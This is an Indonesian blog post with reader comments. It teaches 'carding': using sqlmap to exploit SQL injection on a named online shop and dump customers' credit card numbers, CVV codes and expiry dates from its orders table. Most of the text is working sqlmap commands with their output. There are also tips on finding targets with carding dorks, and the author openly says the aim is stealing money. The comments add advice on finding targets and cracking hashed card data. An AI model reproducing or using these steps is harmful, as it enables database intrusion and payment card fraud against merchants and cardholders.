Monday, 18 May 2015

Tutorial Carding dengan SQL Map

Kali ini Nuenomaru akan menjelaskan dan mempraktekan Carding dengan SQL Map di Linux.
Untuk para pengguna Jendela alias Windows silahkan download dulu toolnya di google agar bisa dijalankan di Python.
Soalnya kali ini Nue akan menjelaskan nya di OS pinguin ;)
utk para pengguna linux silahkan merapat.

Pertama kita siapkan tools" nya dahulu :

1. sqlmap
2. dork carding ( bisa cari di google ) / download
untuk dorking di linux bisa mampir di thread ini dulu: Dorking Dengan BinGoo Di Linux


Pertama tama pastekan Dork di mbah Google.
cari web yang akan di jadikan Target.

Setelah itu kita test URL target dengan memberi kan tanda petik di depan "="
Nah, web tersebut error saat kita inject ,





Kedua, kita eksekusi menggunakan sqlmap :
berikut perintahnya : ./sqlmap -u link --dbs
contoh: sqlmap -u http://www.balboastitch.com/merchandise/index.php?cat=268 --dbs

Disini kita mendapatkan 3 database :


[*] balboast_gkgbu
[*] balboast_gkgcart
[*] information_schema
Setelah itu kita dump database nya untuk mencari table ,
gunakan perintah : ./sqlmap -u link -D namadatabase --tables 
( disini saya coba database "balboast_gkgcart" )

contoh: 
sqlmap -u http://www.balboastitch.com/merchandise/index.php?cat=268 -D balboast_gkgcart --tables


nah, saya dapat tables nya :


Database: balboast_gkgcart                                                                                                                                                                     
[88 tables]
+-----------------------+
| amanu                 |
| categories            |
| clients               |
| components            |
| config                |
| config_groups         |
| customers             |
| form_data             |
| form_fields           |
| forms                 |
| geo                   |
| groups                |
| item_amanu            |
| item_cat              |
| item_files            |
| item_files_customer   |
| item_options          |
| item_options_linked   |
| item_options_values   |
| item_related          |
| item_thread           |
| item_thread_old       |
| items                 |
| items_addphoto        |
| items_item_files      |
| items_packages        |
| languages             |
| logs                  |
| mailinglist           |
| mailinglist_cat       |
| mailinglist_members   |
| manu                  |
| news                  |
| news_cat              |
| news_news_cat         |
| orders                |
| photos                |
| photos_cat            |
| pic_gallery           |
| ship_prices           |
| ship_zones            |
| sites                 |
| sites_components      |
| thread                |
| thread_gel            |
| thread_items          |
| ups                   |
| ups_packaging         |
| ups_pickup            |
| ups_service           |
| ups_units             |
| users                 |
| users_access          |
| users_groups          |
| users_spu             |
| users_spu_values      |
| zones                 |
+-----------------------+
[09:47:41] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/balboastitch.com'

Kita pilih di bagian "orders" . Kita ambil columns nya .
Gunakan perintah : sqlmap -u link -D namadatabase -T namatable --columns

contoh: 
sqlmap -u http://www.balboastitch.com/merchandise/index.php?cat=268 -D balboast_gkgcart -T orders --columns

Maka akan muncul seperti ini : 


Table: orders
[18 columns]
+-----------------+-------------+
| Column          | Type        |
+-----------------+-------------+
| cart_id         | varchar(15) |
| cc_ex_month     | tinyint(4)  |
| cc_ex_year      | int(11)     |
| cc_number       | varchar(30) |
| cc_type         | varchar(20) |
| customer_id     | int(11)     |
| cvv2            | varchar(20) |
| date            | datetime    |
| id              | int(11)     |
| ipaddress       | varchar(25) |
| payment_method  | varchar(15) |
| shipping        | float(8,2)  |
| shipping_method | varchar(5)  |
| status          | tinyint(4)  |
| subtotal        | float(8,2)  |
| tax             | float(8,2)  |
| text            | text        |
| total           | float(8,2)  |
+-----------------+-------------+

Nah :D sudah muncul, selesai sudah..tinggal kita dump 1 per 1 columnsnya bro :)
Caranya : ./sqlmap -u link -D namadatabase -T namatable --dump

contoh : 
sqlmap -u http://www.balboastitch.com/merchandise/index.php?cat=268 -D balboast_gkgcart -T orders -C cc_number --dump
maka nanti cc number akan muncul walau proses agak lama .
semua proses sqlmap akan lama tergantung banyaknya database, tables , columns yang dimiliki web target.
ya jika kalian hanya ingin mau melihat pasword dan user admin web :v coba aja cari sendiri di databasenya :v yaa kalo yang udh masuk ke DB mengarah ke orders :v ya berarti lo lagi mo nyolong uangnya :p
untuk para pengguna windows silahkan download dan instal python,, lalu cari sqlmap.py :D
perintahnya sama aja kok.

Yosh semoga membantu ,, maaf jika masih banyak kekurangan ^_^
tapiii semogaaaa bermanfaat minnaaaa.



./Nuenomaru

Nuenomaru Just an illusion in Cyber World



Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2


7 comments

gan itu agan jalaninnya pake cmd kan?

maaf baru bales kak ^^
baru lihat notif komen di blog utk artikel ini *hehe trnyata ada yang komen..
gini kak, ini saya jalanin di live kali linux, jalanin ini tool lwt terminal di Linux.. tapi ada kok sql map yang di windows *search aja digoogle lbh lengkapnya.
nah kalo yg sql map utk di windows itu jalaninnya lwt CMD ..
sekian, semoga sukses..

Nuenomaru

gan.. cara cari link sasaran gimana??

pakai dork gans :D

Nuenomaru

Nda pake dihash kah mastah biasa nya kan masih nomer acak jadinya

di sqlmap ini dah ada fitur utk hashnya kok bang..
ya kalo sqlmapnya gak bisa ngedecrypt, silahkan cari utk fitur hash di google, atau pakai hash killer utk Linux

#Nuenomaru

http://forexwin77.blogspot.co.id/


EmoticonEmoticon